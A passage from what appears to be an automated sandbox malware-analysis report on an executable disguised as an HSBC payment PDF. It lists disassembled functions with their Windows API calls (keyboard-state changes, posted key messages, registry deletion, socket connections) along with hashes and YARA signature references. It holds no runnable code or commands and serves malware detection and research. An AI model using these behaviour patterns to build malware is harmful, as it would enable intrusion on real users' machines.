                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                                                    • Opcode ID: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                                                                                                                                                    • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                                                                                    • Opcode Fuzzy Hash: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                                                                                                                                                    • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                                                                                    Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 00460F8C
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00461002
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                    • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                    • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                                                                                    • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                    • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                                                                                                    Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(00000000), ref: 00460DA5
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                    • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                    • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                                                                                    • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                    • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                                                                                    Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 004872AA
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                                                                                    • IsMenu.USER32(?), ref: 00487369
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                                                                                    • DrawMenuBar.USER32 ref: 004873C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                                                    • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                    • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                                                                                    • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                    • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                                                                                    Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                                                                                      • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                                                                                      • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                                                                                      • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                                    • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                    • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                                                                                    • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                    • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                                                                                    Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                                                                                    • GetWindowLongW.USER32(00A81188,000000F0), ref: 0048631F
                                                                                                                                                    • GetWindowLongW.USER32(00A81188,000000F0), ref: 00486354
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                    • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                    • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                                                                                    • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                    • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                                                                                    Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 004761C6
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 910771015-0
                                                                                                                                                    • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                    • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                                                                                    • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                    • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                                                                                    Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                                                                                    • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                    • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                    • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                                                                                    • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                    • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                                                                                    Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3253778849-0
                                                                                                                                                    • Opcode ID: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                                                                                                                                                    • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                                                                                    • Opcode Fuzzy Hash: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                                                                                                                                                    • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                                                                                    Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4046560759-0
                                                                                                                                                    • Opcode ID: cba2026341ca6da95bf0f4cc4549495cdff50bb95b91cfbe6af92d2dbe89bd00
                                                                                                                                                    • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                                                                                    • Opcode Fuzzy Hash: cba2026341ca6da95bf0f4cc4549495cdff50bb95b91cfbe6af92d2dbe89bd00
                                                                                                                                                    • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                                                                                    Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                                                                                    • _memmove.LIBCMT ref: 0045EFFD
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1101466143-0
                                                                                                                                                    • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                    • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                                                                                    • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                    • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                                                                                    Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462258
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                                                                                    • IsMenu.USER32(00000000), ref: 004622C3
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004622F7
                                                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3311875123-0
                                                                                                                                                    • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                    • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
